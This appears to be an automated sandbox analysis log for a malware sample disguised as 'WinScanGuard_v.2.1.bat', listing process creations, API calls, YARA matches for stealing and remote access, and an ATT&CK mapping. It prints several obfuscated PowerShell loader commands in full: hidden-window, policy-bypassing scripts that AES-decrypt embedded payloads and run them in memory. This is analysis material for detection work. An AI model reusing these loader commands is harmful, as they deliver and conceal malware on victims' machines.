              Source: C:\Windows\$sxr-cmd.exe | Process created: C:\Windows\$sxr-powershell.exe c:\windows\$sxr-powershell.exe -nologo -noprofile -noninteractive -windowstyle hidden -executionpolicy bypass -command function zxowg($ygfcs){ $hjbvm=[system.security.cryptography.aes]::create(); $hjbvm.mode=[system.security.cryptography.ciphermode]::cbc; $hjbvm.padding=[system.security.cryptography.paddingmode]::pkcs7; $hjbvm.key=[system.convert]::('gnirts46esabmorf'[-1..-16] -join '')('jr/er/s13sxmxzdcdq4cx+zlfjubr/t1zoygzlvi3nc='); $hjbvm.iv=[system.convert]::('gnirts46esabmorf'[-1..-16] -join '')('rigepzaiqqvktp3vmkz42w=='); $shnyr=$hjbvm.('rotpyrcedetaerc'[-1..-15] -join '')(); $ptorz=$shnyr.('kcolblanifmrofsnart'[-1..-19] -join '')($ygfcs, 0, $ygfcs.length); $shnyr.dispose(); $hjbvm.dispose(); $ptorz;}function miajr($ygfcs){ $vhzij=new-object system.io.memorystream(,$ygfcs); $mkycr=new-object system.io.memorystream; $pphyy=new-object system.io.compression.gzipstream($vhzij, [io.compression.compressionmode]::decompress); $pphyy.copyto($mkycr); $pphyy.dispose(); $vhzij.dispose(); $mkycr.dispose(); $mkycr.toarray();}function dettm($ygfcs,$ztwie){ $mzolj=[system.reflection.assembly]::load([byte[]]$ygfcs); $lofyp=$mzolj.entrypoint; $lofyp.invoke($null, $ztwie);}$hjbvm1 = new-object system.security.cryptography.aesmanaged;$hjbvm1.mode = [system.security.cryptography.ciphermode]::cbc;$hjbvm1.padding = [system.security.cryptography.paddingmode]::pkcs7;$hjbvm1.key = [system.convert]::('gnirts46esabmorf'[-1..-16] -join '')('jr/er/s13sxmxzdcdq4cx+zlfjubr/t1zoygzlvi3nc=');$hjbvm1.iv = [system.convert]::('gnirts46esabmorf'[-1..-16] -join '')('rigepzaiqqvktp3vmkz42w==');$ghtel = $hjbvm1.('rotpyrcedetaerc'[-1..-15] -join '')();$tsruf = [system.convert]::('gnirts46esabmorf'[-1..-16] -join '')('/drqfgtkhdxyibtyp3tlyq==');$tsruf = $ghtel.('kcolblanifmrofsnart'[-1..-19] -join '')($tsruf, 0, $tsruf.length);$tsruf = [system.text.encoding]::('8ftu'[-1..-4] -join '').('gnirtsteg'[-1..-9] -join '')($tsruf);$tbgvf = [system.convert]::('gnirts46esabmorf'[-1..-16] -join '')('uyheuy/+hnwqeclfyb1fduqtqym+nhvdwwfjekkh6lu=');$tbgvf = $ghtel.('kcolblanifmrofsnart'[-1..-19] -join '')($tbgvf, 0, $tbgvf.length);$tbgvf = [system.text.encoding]::('8ftu'[-1..-4] -join '').('gnirtsteg'[-1..-9] -join '')($tbgvf);$mjwsq = [system.convert]::('gnirts46esabmorf'[-1..-16] -join '')('v2s4nwnxvxtvxwhesswniq==');$mjwsq = $ghtel.('kcolblanifmrofsnart'[-1..-19] -join '')($mjwsq, 0, $mjwsq.length);$mjwsq = [system.text.encoding]::('8ftu'[-1..-4] -join '').('gnirtsteg'[-1..-9] -join '')($mjwsq);$ibfkh = [system.convert]::('gnirts46esabmorf'[-1..-16] -join '')('rzns/opkxzu99whpuauc1mhvovucskwdcrfz1flzhkq9vipchxwbsxtn8ebodaixzcvikg7knsnjqfjixs10dgpnp1rgmfss0ufgfy1hhpebrscxylrfwuglvdikxksncnlet01zqtp7t1afzszuifryhdaonnd/a48fsobov6s0dg4uz6it5eohk560k0okdqhofxejn4remuw/qa+ofghhvk0nkszmziwificol824a/ijhuaivvnxisy3kfqxbk9sxrwii48yb3r5ehdu2sfoodwj4/p9sudfwqjtgeixdzh4kvsxjz0xve4zypd+he6+n8ebmzvscb8hkun/+dzmxufdtfwwv5marcy6zdmo2yj4s2sbozzspvxkuwpa7yffsyhuzq4rpk9yysf5mqw
              Source: C:\Windows\$sxr-powershell.exe | Process created: C:\Windows\$sxr-powershell.exe "c:\windows\$sxr-powershell.exe" -nologo -noprofile -noninteractive -windowstyle hidden -executionpolicy bypass -command [system.diagnostics.process]::getprocessbyid(5088).waitforexit();[system.threading.thread]::sleep(5000); function zxowg($ygfcs){ $hjbvm=[system.security.cryptography.aes]::create(); $hjbvm.mode=[system.security.cryptography.ciphermode]::cbc; $hjbvm.padding=[system.security.cryptography.paddingmode]::pkcs7; $hjbvm.key=[system.convert]::('gnirts46esabmorf'[-1..-16] -join '')('jr/er/s13sxmxzdcdq4cx+zlfjubr/t1zoygzlvi3nc='); $hjbvm.iv=[system.convert]::('gnirts46esabmorf'[-1..-16] -join '')('rigepzaiqqvktp3vmkz42w=='); $shnyr=$hjbvm.('rotpyrcedetaerc'[-1..-15] -join '')(); $ptorz=$shnyr.('kcolblanifmrofsnart'[-1..-19] -join '')($ygfcs, 0, $ygfcs.length); $shnyr.dispose(); $hjbvm.dispose(); $ptorz;}function miajr($ygfcs){ $vhzij=new-object system.io.memorystream(,$ygfcs); $mkycr=new-object system.io.memorystream; $pphyy=new-object system.io.compression.gzipstream($vhzij, [io.compression.compressionmode]::decompress); $pphyy.copyto($mkycr); $pphyy.dispose(); $vhzij.dispose(); $mkycr.dispose(); $mkycr.toarray();}function dettm($ygfcs,$ztwie){ $mzolj=[system.reflection.assembly]::load([byte[]]$ygfcs); $lofyp=$mzolj.entrypoint; $lofyp.invoke($null, $ztwie);}$hjbvm1 = new-object system.security.cryptography.aesmanaged;$hjbvm1.mode = [system.security.cryptography.ciphermode]::cbc;$hjbvm1.padding = [system.security.cryptography.paddingmode]::pkcs7;$hjbvm1.key = [system.convert]::('gnirts46esabmorf'[-1..-16] -join '')('jr/er/s13sxmxzdcdq4cx+zlfjubr/t1zoygzlvi3nc=');$hjbvm1.iv = [system.convert]::('gnirts46esabmorf'[-1..-16] -join '')('rigepzaiqqvktp3vmkz42w==');$ghtel = $hjbvm1.('rotpyrcedetaerc'[-1..-15] -join '')();$tsruf = [system.convert]::('gnirts46esabmorf'[-1..-16] -join '')('/drqfgtkhdxyibtyp3tlyq==');$tsruf = $ghtel.('kcolblanifmrofsnart'[-1..-19] -join '')($tsruf, 0, $tsruf.length);$tsruf = [system.text.encoding]::('8ftu'[-1..-4] -join '').('gnirtsteg'[-1..-9] -join '')($tsruf);$tbgvf = [system.convert]::('gnirts46esabmorf'[-1..-16] -join '')('uyheuy/+hnwqeclfyb1fduqtqym+nhvdwwfjekkh6lu=');$tbgvf = $ghtel.('kcolblanifmrofsnart'[-1..-19] -join '')($tbgvf, 0, $tbgvf.length);$tbgvf = [system.text.encoding]::('8ftu'[-1..-4] -join '').('gnirtsteg'[-1..-9] -join '')($tbgvf);$mjwsq = [system.convert]::('gnirts46esabmorf'[-1..-16] -join '')('v2s4nwnxvxtvxwhesswniq==');$mjwsq = $ghtel.('kcolblanifmrofsnart'[-1..-19] -join '')($mjwsq, 0, $mjwsq.length);$mjwsq = [system.text.encoding]::('8ftu'[-1..-4] -join '').('gnirtsteg'[-1..-9] -join '')($mjwsq);$ibfkh = [system.convert]::('gnirts46esabmorf'[-1..-16] -join '')('rzns/opkxzu99whpuauc1mhvovucskwdcrfz1flzhkq9vipchxwbsxtn8ebodaixzcvikg7knsnjqfjixs10dgpnp1rgmfss0ufgfy1hhpebrscxylrfwuglvdikxksncnlet01zqtp7t1afzszuifryhdaonnd/a48fsobov6s0dg4uz6it5eohk560k0okdqhofxejn4remuw/qa+ofghhvk0nkszmziwificol824a/ijhuaivvnxisy3kfqxbk9sxrwii48yb3r5ehdu2sfoodwj4/p9sudfwqjtgeixd
Source: C:\Windows\System32\cmd.exe | Process created: C:\Users\user\Desktop\WinScanGuard_v.2.1.bat.exe "WinScanGuard_v.2.1.bat.exe" -noprofile -windowstyle hidden -ep bypass -command function oLSgt($QHQwZ){ $FhDgh=[System.Security.Cryptography.Aes]::Create(); $FhDgh.Mode=[System.Security.Cryptography.CipherMode]::CBC; $FhDgh.Padding=[System.Security.Cryptography.PaddingMode]::PKCS7; $FhDgh.Key=[System.Convert]::('gnirtS46esaBmorF'[-1..-16] -join '')('ONJSi5FjJzv4AOEMBvugvr4ituUVmgVNRnjeJyrP0WQ='); $FhDgh.IV=[System.Convert]::('gnirtS46esaBmorF'[-1..-16] -join '')('CLQNYwl0vsdfD4X+5YKrxQ=='); $SpFlB=$FhDgh.CreateDecryptor(); $return_var=$SpFlB.TransformFinalBlock($QHQwZ, 0, $QHQwZ.Length); $SpFlB.Dispose(); $FhDgh.Dispose(); $return_var;}function rnHmS($QHQwZ){ $WxVgK=New-Object System.IO.MemoryStream(,$QHQwZ); $bpCBe=New-Object System.IO.MemoryStream; $coUVU=New-Object System.IO.Compression.GZipStream($WxVgK, [IO.Compression.CompressionMode]::Decompress); $coUVU.CopyTo($bpCBe); $coUVU.Dispose(); $WxVgK.Dispose(); $bpCBe.Dispose(); $bpCBe.ToArray();}function ZAtIe($QHQwZ,$cjUqy){ $oSPmD=[System.Reflection.Assembly]::('daoL'[-1..-4] -join '')([byte[]]$QHQwZ); $xWTDt=$oSPmD.EntryPoint; $xWTDt.Invoke($null, $cjUqy);}$YlWDR=[System.IO.File]::('txeTllAdaeR'[-1..-11] -join '')('C:\Users\user\Desktop\WinScanGuard_v.2.1.bat').Split([Environment]::NewLine);foreach ($XUIQg in $YlWDR) { if ($XUIQg.StartsWith('SEROXEN')) { $sOgSv=$XUIQg.Substring(7); break; }}$ZErMU=[string[]]$sOgSv.Split('\');$tzgBc=rnHmS (oLSgt ([Convert]::('gnirtS46esaBmorF'[-1..-16] -join '')($ZErMU[0])));$TtDxt=rnHmS (oLSgt ([Convert]::('gnirtS46esaBmorF'[-1..-16] -join '')($ZErMU[1])));ZAtIe $TtDxt (,[string[]] ('', 'idTznCCsreqaEEjvuwzuTuitglIVMFHEuLsTnnuHsLwyMmxaqK', 'LkIzMJCsatThEdeYOSSAwnZMOfyqejPcYtnoxQiuObLPDohIJN'));ZAtIe $tzgBc (,[string[]] ('', 'idTznCCsreqaEEjvuwzuTuitglIVMFHEuLsTnnuHsLwyMmxaqK', 'LkIzMJCsatThEdeYOSSAwnZMOfyqejPcYtnoxQiuObLPDohIJN'));
Source: C:\Users\user\Desktop\WinScanGuard_v.2.1.bat.exe | Process created: C:\Windows\System32\dllhost.exe C:\Windows\System32\dllhost.exe /Processid:{17980c38-011a-4e2a-a8da-a3b9e80db269}
Source: C:\Users\user\Desktop\WinScanGuard_v.2.1.bat.exe | Process created: C:\Windows\SysWOW64\dllhost.exe C:\Windows\SysWOW64\dllhost.exe /Processid:{6ee5d1df-df32-414a-8053-43a03a04def5}
Source: C:\Users\user\Desktop\WinScanGuard_v.2.1.bat.exe | Process created: C:\Windows\System32\dllhost.exe C:\Windows\System32\dllhost.exe /Processid:{b60ad232-6d40-4822-9220-52a4d3050cb3}
Source: C:\Users\user\Desktop\WinScanGuard_v.2.1.bat.exe | Process created: C:\Windows\SysWOW64\dllhost.exe C:\Windows\SysWOW64\dllhost.exe /Processid:{603825cb-58d6-4ab4-99a0-2fdb5cd309d6}
Source: C:\Users\user\Desktop\WinScanGuard_v.2.1.bat.exe | Process created: unknown unknown
Source: C:\Windows\$sxr-mshta.exe | Process created: C:\Windows\$sxr-cmd.exe "C:\Windows\$sxr-cmd.exe" /c %$sxr-bWTLJBKbogHiYUerhoAr4312:&#<?=%
Source: C:\Windows\$sxr-cmd.exe | Process created: C:\Windows\$sxr-powershell.exe C:\Windows\$sxr-powershell.exe -NoLogo -NoProfile -Noninteractive -WindowStyle hidden -ExecutionPolicy bypass -Command function ZXowG($YGfCS){ $HJBVM=[System.Security.Cryptography.Aes]::Create(); $HJBVM.Mode=[System.Security.Cryptography.CipherMode]::CBC; $HJBVM.Padding=[System.Security.Cryptography.PaddingMode]::PKCS7; $HJBVM.Key=[System.Convert]::('gnirtS46esaBmorF'[-1..-16] -join '')('jR/ER/S13sxmxzdcDQ4cx+zLfjuBr/t1zOyGZlvi3Nc='); $HJBVM.IV=[System.Convert]::('gnirtS46esaBmorF'[-1..-16] -join '')('RiGEPzaIqqVKtP3vMKz42w=='); $SHNYR=$HJBVM.('rotpyrceDetaerC'[-1..-15] -join '')(); $ptoRz=$SHNYR.('kcolBlaniFmrofsnarT'[-1..-19] -join '')($YGfCS, 0, $YGfCS.Length); $SHNYR.Dispose(); $HJBVM.Dispose(); $ptoRz;}function MiajR($YGfCS){ $VHZiJ=New-Object System.IO.MemoryStream(,$YGfCS); $MKYCr=New-Object System.IO.MemoryStream; $pphYy=New-Object System.IO.Compression.GZipStream($VHZiJ, [IO.Compression.CompressionMode]::Decompress); $pphYy.CopyTo($MKYCr); $pphYy.Dispose(); $VHZiJ.Dispose(); $MKYCr.Dispose(); $MKYCr.ToArray();}function DEttm($YGfCS,$ZtwIE){ $mZolj=[System.Reflection.Assembly]::Load([byte[]]$YGfCS); $lOFyP=$mZolj.EntryPoint; $lOFyP.Invoke($null, $ZtwIE);}$HJBVM1 = New-Object System.Security.Cryptography.AesManaged;$HJBVM1.Mode = [System.Security.Cryptography.CipherMode]::CBC;$HJBVM1.Padding = [System.Security.Cryptography.PaddingMode]::PKCS7;$HJBVM1.Key = [System.Convert]::('gnirtS46esaBmorF'[-1..-16] -join '')('jR/ER/S13sxmxzdcDQ4cx+zLfjuBr/t1zOyGZlvi3Nc=');$HJBVM1.IV = [System.Convert]::('gnirtS46esaBmorF'[-1..-16] -join '')('RiGEPzaIqqVKtP3vMKz42w==');$GhtEl = $HJBVM1.('rotpyrceDetaerC'[-1..-15] -join '')();$tSRUF = [System.Convert]::('gnirtS46esaBmorF'[-1..-16] -join '')('/drqfgtKhdXyibTYP3tLyQ==');$tSRUF = $GhtEl.('kcolBlaniFmrofsnarT'[-1..-19] -join '')($tSRUF, 0, $tSRUF.Length);$tSRUF = [System.Text.Encoding]::('8FTU'[-1..-4] -join '').('gnirtSteG'[-1..-9] -join '')($tSRUF);$tbgVF = [System.Convert]::('gnirtS46esaBmorF'[-1..-16] -join '')('uYhEUY/+HnwQeclFyB1FDUqtQym+nHVdwwfjEKKh6LU=');$tbgVF = $GhtEl.('kcolBlaniFmrofsnarT'[-1..-19] -join '')($tbgVF, 0, $tbgVF.Length);$tbgVF = [System.Text.Encoding]::('8FTU'[-1..-4] -join '').('gnirtSteG'[-1..-9] -join '')($tbgVF);$mjWsq = [System.Convert]::('gnirtS46esaBmorF'[-1..-16] -join '')('v2S4NwnXvXtvXwhesSwNIQ==');$mjWsq = $GhtEl.('kcolBlaniFmrofsnarT'[-1..-19] -join '')($mjWsq, 0, $mjWsq.Length);$mjWsq = [System.Text.Encoding]::('8FTU'[-1..-4] -join '').('gnirtSteG'[-1..-9] -join '')($mjWsq);$iBFKh = [System.Convert]::('gnirtS46esaBmorF'[-1..-16] -join '')('RZnS/OPKxZu99whpuaUC1mhVovuCskWdCRfz1FlzhkQ9viPcHXWbSXtn8ebOdAixZCvIKg7kNsNJQfjixS10DgPnP1RgMFsS0Ufgfy1HhpeBrScxYLrFwuGlVdIKxKsNCNlET01ZQTP7t1afzsZuiFRyhdaoNNd/a48fSObOV6s0Dg4uz6IT5eoHk560k0oKDQhofXeJn4REmUW/Qa+OFgHhvk0nKSZmZIWIfiCOl824A/iJhUAIvvnXISy3KfqXbk9SxrWiI48yb3R5eHDU2SFOOdwj4/P9sUdFWqjTGEiXdZH4kVSXjz0XVe4ZYpD+he6+N8ebMZVScb8HKUN/+DzmXUfDtfwWV5MarCY6ZdmO2yJ4s2sbOzZsPvxKUwPa7yfFsYHuzQ4rPk9Yysf5MqW
Source: C:\Windows\$sxr-powershell.exe | Process created: C:\Windows\System32\dllhost.exe C:\Windows\System32\dllhost.exe /Processid:{d814285b-904f-4c3a-8cab-4579f96b72d9}
Source: C:\Windows\$sxr-powershell.exe | Process created: C:\Windows\SysWOW64\dllhost.exe C:\Windows\SysWOW64\dllhost.exe /Processid:{f835588e-a1ef-4d6b-bc1e-b44ddb22d787}
Source: C:\Windows\$sxr-powershell.exe | Process created: C:\Windows\$sxr-powershell.exe "C:\Windows\$sxr-powershell.exe" -NoLogo -NoProfile -Noninteractive -WindowStyle hidden -ExecutionPolicy bypass -Command [System.Diagnostics.Process]::GetProcessById(5088).WaitForExit();[System.Threading.Thread]::Sleep(5000); function ZXowG($YGfCS){ $HJBVM=[System.Security.Cryptography.Aes]::Create(); $HJBVM.Mode=[System.Security.Cryptography.CipherMode]::CBC; $HJBVM.Padding=[System.Security.Cryptography.PaddingMode]::PKCS7; $HJBVM.Key=[System.Convert]::('gnirtS46esaBmorF'[-1..-16] -join '')('jR/ER/S13sxmxzdcDQ4cx+zLfjuBr/t1zOyGZlvi3Nc='); $HJBVM.IV=[System.Convert]::('gnirtS46esaBmorF'[-1..-16] -join '')('RiGEPzaIqqVKtP3vMKz42w=='); $SHNYR=$HJBVM.('rotpyrceDetaerC'[-1..-15] -join '')(); $ptoRz=$SHNYR.('kcolBlaniFmrofsnarT'[-1..-19] -join '')($YGfCS, 0, $YGfCS.Length); $SHNYR.Dispose(); $HJBVM.Dispose(); $ptoRz;}function MiajR($YGfCS){ $VHZiJ=New-Object System.IO.MemoryStream(,$YGfCS); $MKYCr=New-Object System.IO.MemoryStream; $pphYy=New-Object System.IO.Compression.GZipStream($VHZiJ, [IO.Compression.CompressionMode]::Decompress); $pphYy.CopyTo($MKYCr); $pphYy.Dispose(); $VHZiJ.Dispose(); $MKYCr.Dispose(); $MKYCr.ToArray();}function DEttm($YGfCS,$ZtwIE){ $mZolj=[System.Reflection.Assembly]::Load([byte[]]$YGfCS); $lOFyP=$mZolj.EntryPoint; $lOFyP.Invoke($null, $ZtwIE);}$HJBVM1 = New-Object System.Security.Cryptography.AesManaged;$HJBVM1.Mode = [System.Security.Cryptography.CipherMode]::CBC;$HJBVM1.Padding = [System.Security.Cryptography.PaddingMode]::PKCS7;$HJBVM1.Key = [System.Convert]::('gnirtS46esaBmorF'[-1..-16] -join '')('jR/ER/S13sxmxzdcDQ4cx+zLfjuBr/t1zOyGZlvi3Nc=');$HJBVM1.IV = [System.Convert]::('gnirtS46esaBmorF'[-1..-16] -join '')('RiGEPzaIqqVKtP3vMKz42w==');$GhtEl = $HJBVM1.('rotpyrceDetaerC'[-1..-15] -join '')();$tSRUF = [System.Convert]::('gnirtS46esaBmorF'[-1..-16] -join '')('/drqfgtKhdXyibTYP3tLyQ==');$tSRUF = $GhtEl.('kcolBlaniFmrofsnarT'[-1..-19] -join '')($tSRUF, 0, $tSRUF.Length);$tSRUF = [System.Text.Encoding]::('8FTU'[-1..-4] -join '').('gnirtSteG'[-1..-9] -join '')($tSRUF);$tbgVF = [System.Convert]::('gnirtS46esaBmorF'[-1..-16] -join '')('uYhEUY/+HnwQeclFyB1FDUqtQym+nHVdwwfjEKKh6LU=');$tbgVF = $GhtEl.('kcolBlaniFmrofsnarT'[-1..-19] -join '')($tbgVF, 0, $tbgVF.Length);$tbgVF = [System.Text.Encoding]::('8FTU'[-1..-4] -join '').('gnirtSteG'[-1..-9] -join '')($tbgVF);$mjWsq = [System.Convert]::('gnirtS46esaBmorF'[-1..-16] -join '')('v2S4NwnXvXtvXwhesSwNIQ==');$mjWsq = $GhtEl.('kcolBlaniFmrofsnarT'[-1..-19] -join '')($mjWsq, 0, $mjWsq.Length);$mjWsq = [System.Text.Encoding]::('8FTU'[-1..-4] -join '').('gnirtSteG'[-1..-9] -join '')($mjWsq);$iBFKh = [System.Convert]::('gnirtS46esaBmorF'[-1..-16] -join '')('RZnS/OPKxZu99whpuaUC1mhVovuCskWdCRfz1FlzhkQ9viPcHXWbSXtn8ebOdAixZCvIKg7kNsNJQfjixS10DgPnP1RgMFsS0Ufgfy1HhpeBrScxYLrFwuGlVdIKxKsNCNlET01ZQTP7t1afzsZuiFRyhdaoNNd/a48fSObOV6s0Dg4uz6IT5eoHk560k0oKDQhofXeJn4REmUW/Qa+OFgHhvk0nKSZmZIWIfiCOl824A/iJhUAIvvnXISy3KfqXbk9SxrWiI48yb3R5eHDU2SFOOdwj4/P9sUdFWqjTGEiXd
Source: C:\Windows\$sxr-powershell.exe | Process created: C:\Windows\System32\dllhost.exe C:\Windows\System32\dllhost.exe /Processid:{ee0091e4-9e0c-4ff3-b26f-57d4a238bd7c}
Source: C:\Windows\$sxr-powershell.exe | Process created: C:\Windows\SysWOW64\dllhost.exe C:\Windows\SysWOW64\dllhost.exe /Processid:{f5381469-1700-4694-82dd-1722ad94b3e0}
Source: C:\Windows\$sxr-powershell.exe | Process created: C:\Windows\System32\dllhost.exe C:\Windows\System32\dllhost.exe /Processid:{f78b27af-93da-4459-95e7-4c5d26a44dc8}
Source: C:\Windows\$sxr-powershell.exe | Process created: C:\Windows\System32\dllhost.exe C:\Windows\System32\dllhost.exe /Processid:{85d85a52-fed6-47b1-b615-c3a69ff1ad14}
Source: C:\Windows\$sxr-powershell.exe | Process created: C:\Windows\SysWOW64\dllhost.exe C:\Windows\SysWOW64\dllhost.exe /Processid:{8c0bd129-911b-4af2-a0bc-93995d45cd5f}
Source: C:\Windows\$sxr-powershell.exe | Process created: C:\Windows\SysWOW64\dllhost.exe C:\Windows\SysWOW64\dllhost.exe /Processid:{0979c3ff-3e63-4ea9-9d2b-0e24c33cbca9}
Source: C:\Windows\$sxr-powershell.exe | Process created: C:\Windows\System32\dllhost.exe C:\Windows\System32\dllhost.exe /Processid:{59453cd9-80c7-4c7f-84ca-38ec20f032b9}
Source: C:\Windows\$sxr-powershell.exe | Process created: C:\Windows\System32\dllhost.exe C:\Windows\System32\dllhost.exe /Processid:{8b9e4941-156b-4561-b75c-88dc752d3d8b}
Source: C:\Windows\$sxr-powershell.exe | Process created: C:\Windows\SysWOW64\dllhost.exe C:\Windows\SysWOW64\dllhost.exe /Processid:{da1a065e-b06d-4c17-9fd5-69413fe213f9}
Source: C:\Windows\$sxr-powershell.exe | Process created: C:\Windows\SysWOW64\dllhost.exe C:\Windows\SysWOW64\dllhost.exe /Processid:{2c62f067-a6a0-49cc-8f1a-bf6b18a4e5be}
Source: C:\Windows\$sxr-powershell.exe | Process created: unknown unknown
Source: C:\Windows\SysWOW64\dllhost.exe | Code function: 23_2_00401BC6 AllocateAndInitializeSid,SetEntriesInAclW,LocalAlloc,InitializeSecurityDescriptor,SetSecurityDescriptorDacl,CreateNamedPipeW,23_2_00401BC6
Source: dwm.exe, 0000001E.00000002.2927665635.000002BAA7B6D000.00000004.00000020.00020000.00000000.sdmp, dwm.exe, 0000001E.00000000.2057222338.000002BAA7B6D000.00000004.00000020.00020000.00000000.sdmp | Binary or memory string: Program Manager
Source: winlogon.exe, 00000018.00000000.2043727708.00000225DCB70000.00000002.00000001.00040000.00000000.sdmp, winlogon.exe, 00000018.00000002.2916405996.00000225DCB70000.00000002.00000001.00040000.00000000.sdmp, dwm.exe, 0000001E.00000002.2930465673.000002BAA8050000.00000002.00000001.00040000.00000000.sdmp | Binary or memory string: Shell_TrayWnd
Source: winlogon.exe, 00000018.00000000.2043727708.00000225DCB70000.00000002.00000001.00040000.00000000.sdmp, winlogon.exe, 00000018.00000002.2916405996.00000225DCB70000.00000002.00000001.00040000.00000000.sdmp, dwm.exe, 0000001E.00000002.2930465673.000002BAA8050000.00000002.00000001.00040000.00000000.sdmp | Binary or memory string: Progman
Source: winlogon.exe, 00000018.00000000.2043727708.00000225DCB70000.00000002.00000001.00040000.00000000.sdmp, winlogon.exe, 00000018.00000002.2916405996.00000225DCB70000.00000002.00000001.00040000.00000000.sdmp, dwm.exe, 0000001E.00000002.2930465673.000002BAA8050000.00000002.00000001.00040000.00000000.sdmp | Binary or memory string: Progmanlock
Source: winlogon.exe, 00000018.00000000.2043727708.00000225DCB70000.00000002.00000001.00040000.00000000.sdmp, winlogon.exe, 00000018.00000002.2916405996.00000225DCB70000.00000002.00000001.00040000.00000000.sdmp, dwm.exe, 0000001E.00000002.2930465673.000002BAA8050000.00000002.00000001.00040000.00000000.sdmp | Binary or memory string: }Program Manager
Source: C:\Windows\$sxr-cmd.exe | Code function: GetLocaleInfoW,GetLocaleInfoW,GetLocaleInfoW,GetLocaleInfoW,GetLocaleInfoW,GetLocaleInfoW,GetLocaleInfoW,GetLocaleInfoW,GetLocaleInfoW,GetLocaleInfoW,GetLocaleInfoW,GetLocaleInfoW,GetLocaleInfoW,GetLocaleInfoW,setlocale,16_2_00007FF6155051EC
Source: C:\Windows\$sxr-cmd.exe | Code function: GetSystemTime,SystemTimeToFileTime,FileTimeToLocalFileTime,FileTimeToSystemTime,GetLocaleInfoW,memmove,GetDateFormatW,GetDateFormatW,realloc,GetDateFormatW,memmove,GetLastError,realloc,16_2_00007FF6154F6EE4
Source: C:\Windows\$sxr-cmd.exe | Code function: GetSystemTime,SystemTimeToFileTime,FileTimeToLocalFileTime,FileTimeToSystemTime,GetLocaleInfoW,memmove,GetTimeFormatW,16_2_00007FF615503140
Source: C:\Windows\System32\cmd.exe | Queries volume information: C:\ VolumeInformation
Source: C:\Users\user\Desktop\WinScanGuard_v.2.1.bat.exe | Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation
Source: C:\Users\user\Desktop\WinScanGuard_v.2.1.bat.exe | Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_64\System.Data\v4.0_4.0.0.0__b77a5c561934e089\System.Data.dll VolumeInformation
Source: C:\Users\user\Desktop\WinScanGuard_v.2.1.bat.exe | Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_64\System.Transactions\v4.0_4.0.0.0__b77a5c561934e089\System.Transactions.dll VolumeInformation
Source: C:\Users\user\Desktop\WinScanGuard_v.2.1.bat.exe | Queries volume information: C:\ VolumeInformation
Source: C:\Windows\$sxr-cmd.exe | Queries volume information: C:\ VolumeInformation
Source: C:\Windows\$sxr-powershell.exe | Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_64\System.Data\v4.0_4.0.0.0__b77a5c561934e089\System.Data.dll VolumeInformation
Source: C:\Windows\$sxr-powershell.exe | Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation
Source: C:\Windows\$sxr-powershell.exe | Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_64\System.Transactions\v4.0_4.0.0.0__b77a5c561934e089\System.Transactions.dll VolumeInformation
Source: C:\Windows\$sxr-powershell.exe | Queries volume information: C:\ VolumeInformation
Source: C:\Windows\$sxr-powershell.exe | Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.Security\v4.0_4.0.0.0__b03f5f7f11d50a3a\System.Security.dll VolumeInformation
Source: C:\Windows\$sxr-powershell.exe | Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.Data.SqlXml\v4.0_4.0.0.0__b77a5c561934e089\System.Data.SqlXml.dll VolumeInformation
Source: C:\Windows\$sxr-powershell.exe | Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.Web.Extensions\v4.0_4.0.0.0__31bf3856ad364e35\System.Web.Extensions.dll VolumeInformation
Source: C:\Windows\$sxr-powershell.exe | Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.ServiceModel.Internals\v4.0_4.0.0.0__31bf3856ad364e35\System.ServiceModel.Internals.dll VolumeInformation
Source: C:\Windows\$sxr-mshta.exe | Code function: 13_2_000001A00AAE1540 cpuid 13_2_000001A00AAE1540
Source: C:\Users\user\Desktop\WinScanGuard_v.2.1.bat.exe | Key value queried: HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Cryptography MachineGuid
Source: C:\Windows\$sxr-mshta.exe | Code function: 13_2_000001A00BDB7AE0 GetSystemTimeAsFileTime,GetCurrentThreadId,GetCurrentProcessId,QueryPerformanceCounter,13_2_000001A00BDB7AE0
Source: C:\Windows\System32\dllhost.exe | Code function: 22_2_000000014000165C CreateNamedPipeW,22_2_000000014000165C
Source: C:\Windows\$sxr-mshta.exe | Code function: 13_2_00007FF7142F1008 GetVersion,GetModuleHandleW,GetProcAddress,LoadLibraryW,GetProcAddress,FreeLibrary,RegOpenKeyExA,RegQueryValueExA,ExpandEnvironmentStringsA,LoadLibraryA,RegCloseKey,GetModuleHandleW,GetProcAddress,MultiByteToWideChar,UnregisterApplicationRestart,GetProcAddress,FreeLibrary,RegCloseKey,13_2_00007FF7142F1008
Source: Amcache.hve.10.dr | Binary or memory string: c:\programdata\microsoft\windows defender\platform\4.18.23080.2006-0\msmpeng.exe
Source: Amcache.hve.10.dr | Binary or memory string: msmpeng.exe
Source: Amcache.hve.10.dr | Binary or memory string: c:\program files\windows defender\msmpeng.exe
Source: Amcache.hve.10.dr | Binary or memory string: MsMpEng.exe

              Stealing of Sensitive Information

Source: Yara match | File source: Process Memory Space: $sxr-powershell.exe PID: 5088, type: MEMORYSTR

              Remote Access Functionality

Source: Yara match | File source: Process Memory Space: $sxr-powershell.exe PID: 5088, type: MEMORYSTR
ATT&CK Matrix: techniques with matching signatures, grouped by tactic (the number in front of each technique is the count of matching signatures)

Initial Access: 1 Valid Accounts
Execution: 1 Windows Management Instrumentation; 1 Scripting; 2 Native API; 21 Command and Scripting Interpreter; 1 Scheduled Task/Job; 31 PowerShell
Persistence: 1 DLL Side-Loading; 1 Valid Accounts; 1 Scheduled Task/Job
Privilege Escalation: 1 DLL Side-Loading; 1 Valid Accounts; 11 Access Token Manipulation; 413 Process Injection; 1 Scheduled Task/Job
